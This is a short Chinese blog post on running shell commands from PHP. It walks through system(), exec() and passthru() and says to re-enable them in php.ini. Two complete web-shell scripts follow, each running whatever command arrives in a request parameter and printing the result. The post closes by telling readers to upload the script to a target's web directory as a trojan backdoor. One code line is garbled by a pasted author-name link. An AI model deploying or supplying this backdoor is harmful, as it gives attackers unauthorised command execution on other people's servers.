php執(zhí)行cmd/shell命令 木馬小后門

php執(zhí)行shell命令,可以使用下面幾個(gè)函數(shù):?

string system ( string $command [, int &$return_var ] )string exec ( string $command [, array &$output [, int &$return_var ]] )void passthru ( string $command [, int &$return_var ] )

注意:

這三個(gè)函數(shù)在默認(rèn)的情況下,都是被禁止了的

如果要使用這幾個(gè)函數(shù),

就要先修改php的配置文件php.ini

查找關(guān)鍵字disable_functions,將這一項(xiàng)中的這幾個(gè)函數(shù)名刪除掉

然后注意重啟apache。

首先看一下system()和passthru()兩個(gè)功能類似,可以互換:

<?php#獲取網(wǎng)頁(yè)傳遞參數(shù)$shell = $_REQUEST['shell'];echo "<pre>";system($shell, $status);echo "</pre>";//注意shell命令的執(zhí)行結(jié)果和執(zhí)行返回的狀態(tài)值的對(duì)應(yīng)關(guān)系$shell = "<font color='red'>$shell</font>";if( $status ){echo "shell命令{$shell}執(zhí)行失敗";} else {echo "shell命令{$shell}成功執(zhí)行";}?>

訪問(wèn)地址,并傳遞shell參數(shù)

注意,system()會(huì)將shell命令執(zhí)行之后,立馬顯示結(jié)果,這一點(diǎn)會(huì)比較不方便,因?yàn)槲覀冇袝r(shí)候不需要結(jié)果立馬輸出,甚至不需要輸出,于是可以用到exec()

exec()的使用示例:?

<?php$shell = <a >艾曉園</a> $_REQUEST['shell'];exec($shell, $result, $status);$shell = "<font color='red'>$shell</font>";echo "<pre>";if( $status ){echo "shell命令{$shell}執(zhí)行失敗";} else {echo "shell命令{$shell}成功執(zhí)行, 結(jié)果如下<hr>";print_r( $result );}echo "</pre>";?>

exec()執(zhí)行shell命令成功,但是并不返回結(jié)果,需要使用輸出命令,輸出$result結(jié)果

作為木馬小后門,上傳到對(duì)方服務(wù)器下的網(wǎng)站目錄下,訪問(wèn)該地址,就可以在靶機(jī)上執(zhí)行你想執(zhí)行的命令,并且拿到回顯結(jié)果。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容